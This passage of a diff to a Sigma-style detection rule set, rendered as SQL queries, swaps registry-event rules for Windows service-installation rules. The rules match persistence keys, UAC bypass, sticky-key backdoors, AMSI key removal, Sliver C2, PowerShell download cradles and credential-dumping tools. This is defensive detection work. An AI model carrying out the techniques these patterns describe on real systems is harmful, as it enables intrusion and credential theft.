"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": 
"registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - 
"Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') 
AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" - }, - { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "status": "experimental", - "description": "Detects the usage 
and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "filename": "win_system_powershell_script_installed_as_service.yml" + }, + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File 
Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1137.002" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Suspicious 
Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR 
(ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_event_persistence_recycle_bin.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", + "title": "Remote Access Tool Services Have Been Installed - System", + "id": "1a31b18a-f00c-4061-9900-f735b96c99fc", + "status": "experimental", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1543.003", + "attack.t1569.002" ], - "level": "critical", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036') AND (ServiceName LIKE '%SSUService%' ESCAPE '\\' OR ServiceName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceName LIKE '%Atera%' ESCAPE '\\' OR ServiceName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceName LIKE '%RPCService%' ESCAPE '\\' OR ServiceName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceName LIKE '%monblanking%' ESCAPE '\\' OR 
ServiceName LIKE '%RManService%' ESCAPE '\\' OR ServiceName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceName LIKE '%vncserver%' ESCAPE '\\' OR ServiceName LIKE '%Parsec%' ESCAPE '\\' OR ServiceName LIKE '%chromoting%' ESCAPE '\\' OR ServiceName LIKE '%Zoho%' ESCAPE '\\' OR ServiceName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_service_install_remote_access_software.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", + "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" ], - "filename": 
"registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "status": "experimental", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik 
Seetharaman", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "status": "experimental", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Removal Of SD Value to Hide Schedule Task - Registry", - "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "title": "New PDQDeploy Service - Client Side", + "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", "status": "experimental", - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", - "author": "Sittikorn S", + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" ], - "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + "filename": "win_system_service_install_pdqdeploy_runner.yml" }, { - "title": "Removal of Potential COM Hijacking Registry Keys", - "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "status": "test", - "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Anydesk Remote Access Software Service Installation", + "id": "530a6faa-ff3d-4022-b315-50828e77eef5", + "status": "experimental", + "description": "Detects the installation of the anydesk software service. 
Which could be an indication of anydesk abuse if you the software isn't already used.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + "Legitimate usage of the anydesk tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'AnyDesk Service')" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_service_install_anydesk.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Tap Driver Installation", + "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unlikely" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_tap_driver_installation.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys 
containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "status": "experimental", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath 